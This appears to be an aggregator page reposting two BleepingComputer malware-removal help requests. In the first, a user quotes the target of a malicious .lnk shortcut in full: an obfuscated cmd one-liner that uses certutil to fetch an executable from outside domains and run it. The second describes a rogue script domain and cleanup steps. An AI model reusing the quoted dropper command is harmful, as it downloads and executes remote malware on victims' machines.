Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Jackyhillty malware (mightve fixed it) - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Well the good news is Ivent needed to post here in ages. I was afraid Id forgotten my password.

I noticed yesterday and the day before in NoScript that there was a script trying to connect to a website jackyhillty dot com or net. I thought maybe it was some new widget on websites at first, but I soon noticed it was on EVERY page. Thank goodness for NoScript! I scanned with AVG and MalwareBytes and one of them found a PUP something and quarantined it. I also ran spybot s&D. I downloaded kaspersky but it doesnt like malwarebytes, so I cancelled Kaspersky and figured Id remove Malwarebytes the next day (it was 6am lol). Which I did. Then needed to restart to install Kaspersky, but they keyboard was disabled at the Windows login. I tried booting into safe mode, no luck with the repeated shutdowns method. Frustrated, I was able to get into the ASUS bios and booted into Elementary OS (which I setup the other day finally after years of planning; Ive had enough of Bill Gates and his arrogance in the public sphere) where I did a little research and was about to post here but saw I needed to get the Windows version info, so I decided to restart into windows one more time to try to get it or try from ASUS bios. It was then, that I found screen keyboard and was able to login to windows! The keyboard was now working, and I was able to get Kaspersky installed, and Im going to try scanning with that.

Is there anything else I should do to make sure this malware is gone?

Version 1903 OS Build 18362.720

Let me know anything else you need.

Thanks as always.

Once this is done and I get everything in order, I am switching over to Linux permanently. :D

Edited by hamluis, 06 April 2020 - 05:28 PM.
Moved from W10 Spt to MRL - Hamluis.



Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US